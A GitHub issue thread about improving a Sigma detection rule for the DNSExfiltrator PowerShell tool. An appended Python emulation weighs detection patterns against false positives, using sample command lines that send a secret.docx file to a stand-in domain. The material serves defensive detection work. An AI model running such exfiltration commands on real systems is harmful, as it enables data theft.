DNS Exfiltration rule #4889

Open
pramodpabbati opened this issue Jun 25, 2024 · 2 comments
Work In Progress Some changes are needed
@pramodpabbati

Hello!

Just reviewing the DNS exfiltration rule at - https://github.com/SigmaHQ/sigma/blob/master/rules/windows/powershell/powershell_script/posh_ps_invoke_dnsexfiltration.yml and was curious on the detection logic of looking for "Invoke-DNSExfiltrator" OR all of the flags its running with.

Based on the references and the wiki for the tool, it doesn't look like the detection logic is accurate. Could you please confirm?

Kind Regards,
Pramod

Contributor

Welcome @pramodpabbati 👋

It looks like this is your first issue on the Sigma rules repository!

The following repository accepts issues related to false positives or 'rule ideas'.

If you're reporting an issue related to the pySigma library please consider submitting it here

If you're reporting an issue related to the deprecated sigmac library please consider submitting it here

Thanks for taking the time to open this issue, and welcome to the Sigma community! 😃

@nasbench nasbench added the Work In Progress Some changes are needed label Jun 25, 2024
@nasbench nasbench self-assigned this Jun 25, 2024
@nasbench
Member

Hi @pramodpabbati and thanks for opening this issue.

After looking at the rule in question, it can indeed be improved. The rule focused on using the same args as in the ART example in order to cover potential "renames" of the cmdlets. But as it's shown by the source code, only 3 flags are mandatory.

      file:           [MANDATORY] The file name to the file to be exfiltrated.
      domainName:     [MANDATORY] The domain name to use for DNS requests.
      password:       [MANDATORY] Password used to encrypt the data to be exfiltrated.

And these alone cannot be used to identify the cmdlets. I will work on this and try to enhance the logic a bit more.
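To make the trade-off concrete, the following is an added example (not the Sigma rule's own logic, and not code from the DNSExfiltrator project): a minimal emulation of Sigma's `contains` and `contains|all` modifiers run over constructed ScriptBlockText samples. It assumes the tool's short switches are `-i` (file), `-d` (domain), `-p` (password), with `-doh`/`-b32` as tool-specific optional switches, and models the ART-derived selection as all of `-i -d -p -doh -t`; the switch names, the sample command lines, and the "tightened" heuristic are all assumptions for illustration.

```python
"""Sigma-style string matching for the detection shapes discussed in this
issue, run over constructed PowerShell ScriptBlockText samples.

Assumptions (not taken from the rule or the tool's source):
  - the tool's short switches are -i (file), -d (domain), -p (password),
    with -doh and -b32 as tool-specific optional switches;
  - the ART-derived selection is modelled as all of -i -d -p -doh -t.
"""
from dataclasses import dataclass


@dataclass(frozen=True)
class Selection:
    """One Sigma selection over ScriptBlockText.

    require_all=False behaves like `contains` (any needle),
    require_all=True behaves like `contains|all` (every needle).
    Matching is case-insensitive, as Sigma string modifiers are.
    """
    name: str
    needles: tuple
    require_all: bool = False

    def matches(self, text: str) -> bool:
        hay = text.lower()
        hits = [n.lower() in hay for n in self.needles]
        return all(hits) if self.require_all else any(hits)


# The cmdlet-name selection from the issue.
SEL_NAME = Selection("cmdlet_name", ("Invoke-DNSExfiltrator",))
# Flag set in the shape of the ART example (assumed switches, see docstring).
SEL_ART_FLAGS = Selection("all_art_flags",
                          (" -i ", " -d ", " -p ", " -doh ", " -t "),
                          require_all=True)
# Only the three mandatory switches (file, domainName, password).
SEL_MANDATORY = Selection("mandatory_flags",
                          (" -i ", " -d ", " -p "),
                          require_all=True)
# Tool-specific optional switches used by the tightened variant (assumed).
SEL_TOOL_OPTIONAL = Selection("tool_specific_optional", (" -doh ", " -b32 "))

ALL_SELECTIONS = (SEL_NAME, SEL_ART_FLAGS, SEL_MANDATORY)

# Constructed sample ScriptBlockText values; none are real telemetry.
SAMPLES = {
    "tool_as_published":
        "Invoke-DNSExfiltrator -i C:\\Users\\a\\secret.docx "
        "-d exfil.example.net -p Secret123 -doh google -t 500",
    "tool_renamed_minimal":
        "Invoke-Sync -i C:\\Users\\a\\secret.docx -d exfil.example.net -p Secret123",
    "tool_renamed_with_doh":
        "Invoke-Sync -i C:\\Users\\a\\secret.docx -d exfil.example.net "
        "-p Secret123 -doh cloudflare",
    "benign_admin_script":
        ".\\deploy.ps1 -i inventory.csv -d corp.example.local -p Production",
    "benign_no_flags":
        "Get-ChildItem -Recurse | Where-Object Length -gt 1MB",
}


def evaluate(text: str) -> dict:
    """Which of the three selections match a single ScriptBlockText."""
    return {s.name: s.matches(text) for s in ALL_SELECTIONS}


def current_shape_fires(text: str) -> bool:
    """`condition: 1 of selection*` over name OR all ART-style flags."""
    return SEL_NAME.matches(text) or SEL_ART_FLAGS.matches(text)


def mandatory_only_fires(text: str) -> bool:
    """Name OR just the three mandatory switches."""
    return SEL_NAME.matches(text) or SEL_MANDATORY.matches(text)


def tightened_fires(text: str) -> bool:
    """Name OR (all mandatory switches AND one tool-specific optional switch).

    A candidate heuristic for illustration only, not the maintainers' fix.
    """
    return SEL_NAME.matches(text) or (
        SEL_MANDATORY.matches(text) and SEL_TOOL_OPTIONAL.matches(text))


def summary() -> dict:
    """Per-sample verdicts for the three condition variants."""
    return {
        label: {
            "current": current_shape_fires(text),
            "mandatory_only": mandatory_only_fires(text),
            "tightened": tightened_fires(text),
        }
        for label, text in SAMPLES.items()
    }


if __name__ == "__main__":
    for label, verdict in summary().items():
        print(f"{label:24s} {verdict}")
```

Running it shows the two failure modes side by side: the ART-style flag set misses a renamed cmdlet that passes only the mandatory switches, while the mandatory-only set fires on an unrelated admin script whose parameters happen to abbreviate to `-i`, `-d` and `-p`. Requiring a tool-specific optional switch on top of the mandatory three removes that false positive, but a renamed invocation with nothing beyond the mandatory switches is not distinguishable by substring matching alone, which is why the cmdlet name and any further context still matter.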
